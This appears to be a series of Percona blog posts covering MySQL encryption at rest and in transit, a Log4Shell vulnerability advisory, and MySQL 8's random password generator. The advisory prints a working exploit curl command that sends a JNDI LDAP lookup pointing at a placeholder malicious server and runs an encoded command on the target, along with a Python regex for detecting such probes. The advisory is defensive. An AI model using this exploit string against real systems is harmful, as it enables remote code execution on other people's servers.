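-- Hypothetical table; ssn_enc is VARBINARY to hold the ciphertext
INSERT INTO customers (name, ssn_enc)
VALUES ('Alice', AES_ENCRYPT('123-45-6789', 'example-key'));

-- Reading back requires the key...
SELECT name, AES_DECRYPT(ssn_enc, 'example-key') AS ssn FROM customers;

-- ...and lookups must compare against the encrypted value
SELECT name FROM customers
WHERE ssn_enc = AES_ENCRYPT('123-45-6789', 'example-key');
```

Note that equality lookups like the last one only work while the encryption is deterministic, which is the case for MySQL's default block_encryption_mode.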

Data in Transit

Now that we’ve discussed the different types of data-at-rest encryption, it is important to encrypt traffic to and from the database as well. Connecting to the server via TLS ensures that any sensitive data sent to or from the server is encrypted. This can prevent data from leaking over the wire or via man-in-the-middle attacks.

This is a straightforward way to secure communication, and when combined with some at-rest encryption, serves to check a few more boxes towards various compliances.
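A minimal server-side sketch for enforcing TLS might look like this in my.cnf (file paths are examples):

```
[mysqld]
# Reject any connection that is not protected by TLS
require_secure_transport = ON
ssl-ca   = /etc/mysql/certs/ca.pem
ssl-cert = /etc/mysql/certs/server-cert.pem
ssl-key  = /etc/mysql/certs/server-key.pem
```

TLS can also be required for individual accounts with ALTER USER ... REQUIRE SSL, which is useful when a blanket server-wide requirement is not yet feasible.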


Overall, there are several aspects of encryption in MySQL. This makes it possible to meet many common compliance requirements for different types of regulations. Security is a critical piece of the database tier, and these discussions are needed across teams in an organization. Ensuring that security, infrastructure, and the database team are on the same page is essential, especially during the design phase. Let our Professional Services team help you implement the approach that is best suited for your requirements – we are here to help!

Percona Distribution for MySQL is the most complete, stable, scalable, and secure, open-source MySQL solution available, delivering enterprise-grade database environments for your most critical business applications… and it’s free to use!

Download Percona Distribution for MySQL Today


Log4JShell Vulnerability Update

Percona Security has been tracking an evolving issue over the weekend and into the beginning of this week.

The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.

This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.

The Exploit

The simplest example is:

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

when executed this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing, which seek either to exploit the issue or, at the very least, to confirm its presence.
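As a rough illustration of what such detection probes look for (a naive sketch only; real payloads use many obfuscated variants that this pattern will miss):

```python
import re

# Match the basic JNDI lookup syntax over the common exploit schemes.
# Real-world payloads use nested lookups such as ${lower:j}${lower:n}...
# to evade exactly this kind of simple pattern.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell_probe(line: str) -> bool:
    """Return True if a log/header line contains the basic lookup pattern."""
    return bool(JNDI_PATTERN.search(line))

suspicious = 'X-Api-Version: ${jndi:ldap://malicious_server/a}'
benign = 'X-Api-Version: 1.2.3'
print(looks_like_log4shell_probe(suspicious))  # True
print(looks_like_log4shell_probe(benign))      # False
```

A scan like this can confirm that probing is happening, but absence of matches is not evidence of safety; the authoritative fix remains upgrading log4j itself.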

Is any Percona Software or Service Affected by this Vulnerability?

At the time of writing, no Percona software is known to be affected by the CVE-2021-44228 log4j vulnerability as we do not employ Java in any of the Open Source Software produced here at Percona at this time.

We are of course working with our service vendors and third parties to ensure they too are not affected by this issue and are tracking their response internally via JIRA ticket at the time of writing. Percona is not aware of any of our service providers impacted by the log4j vulnerability at the time of writing.

Where possible, we are employing methods to increase visibility and protection against this issue, applying additional layers of protection even though the underlying software is not affected.

We have validated that the software we are using in our build pipelines is not affected by this issue at the time of writing.

Please refer to the details regarding the appropriate channels of contact, should you wish to raise a direct contact request regarding this or another issue.

UPDATE 2021-12-15:

The fix implemented in log4j 2.15 has been reported as an “incomplete” fix; the new CVE tracking this issue is CVE-2021-45046. As such, log4j currently requires updating to >= 2.16 to fully protect against these issues. While this latest issue is reported as moderate (not high) severity, likely due to the complexity of the exploitation vector, our advice at this time is to ensure you update to address it as well.

Percona continues to track this major issue and take appropriate action to safeguard our clients and users.

We are working on enhancing defences, active scanning, and reporting for indicators of the log4j issues. Although we have not been directly affected at this point, we are taking appropriate measures to safeguard against this class of issue in the future.

Our teams are working diligently on this issue, and we expect to publish further updates as this issue continues to unfold and further detail becomes available through our testing and through the publication of information.

David Busby
Information Security Architect


MySQL 8: Random Password Generator

As part of my ongoing focus on MySQL 8 user and password management, I’ve covered how using the new dual passwords feature can reduce the overall DBA workload and streamline the management process. I’ve also covered how the new password failure tracking features can enable the locking of an account with too many failed password attempts (see MySQL 8: Account Locking).

There are other new and useful features added to the user management capabilities in MySQL 8, however, and an often-overlooked change was the implementation of a random password generator. First introduced in MySQL 8.0.18, this feature gives the CREATE USER, ALTER USER, and SET PASSWORD statements the capability of generating random passwords for user accounts as an alternative to explicit administrator-specified passwords.

Usage of MySQL 8 Random Password Generator

By default, all MySQL-generated random user/account passwords have a length of 20 characters. This can be changed, however, using the ‘generated_random_password_length’ system variable. With a valid range of 5 to 255, this dynamic variable can be set at the global or session level and determines the length of the randomly generated password.

mysql> SHOW VARIABLES LIKE 'generated_random_password_length';
+----------------------------------+-------+
| Variable_name                    | Value |
+----------------------------------+-------+
| generated_random_password_length | 20    |
+----------------------------------+-------+
1 row in set (0.01 sec)
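For example, the length can be lowered for a single session before generating a password (the 'demo' account here is hypothetical):

```sql
SET SESSION generated_random_password_length = 8;
CREATE USER 'demo'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
-- the returned 'generated password' column will now be 8 characters long
```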

Once a random password has been generated for a given user account, the statement stores the password in the ‘mysql.user’ system table, hashed appropriately for the authentication plugin. The cleartext ‘generated password’ is returned in the result set along with the ‘user’ and ‘host’ columns, so that information is available to the user or application. See the examples below:

mysql> CREATE USER 'percona'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
+---------+-----------+----------------------+
| user    | host      | generated password   |
+---------+-----------+----------------------+
| percona | localhost | k%RJ51/kA>,B(74;DBq2 |
+---------+-----------+----------------------+
1 row in set (0.02 sec)

mysql> ALTER USER 'percona'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
+---------+-----------+----------------------+
| user    | host      | generated password   |
+---------+-----------+----------------------+
| percona | localhost | eX!EOssQ,(Hn4dOdw6Om |
+---------+-----------+----------------------+
1 row in set (0.01 sec)

mysql> SET PASSWORD FOR 'percona'@'localhost' TO RANDOM;
+---------+-----------+----------------------+
| user    | host      | generated password   |
+---------+-----------+----------------------+
| percona | localhost | 5ohXP2LBTTPzJ+7oEDL4 |
+---------+-----------+----------------------+
1 row in set (0.00 sec)


The generated password is written to the logs only in hashed form, so the cleartext is never available anywhere other than the initial result set from the user statement (as above). The authentication plugin is also named in the binlog alongside the hashed password value. Below are a couple of examples extracted from the MySQL binlog for the ‘percona’@’localhost’ user that we created and altered earlier:

CREATE USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*5978ACEA46C1B81C7BEE2D1470ED1B002FE6840B'
ALTER USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*2994ECB14E21A8333C8C2DEDF38311EB714D500C'

In Closing

Human imagination is often a limiting factor in choosing secure passwords. The random password capability introduced in MySQL 8.0.18 ensures that there is a standardized method for truly random and secure passwords in your database environment.

Complete the 2021 Percona Open Source Data Management Software Survey

Have Your Say!
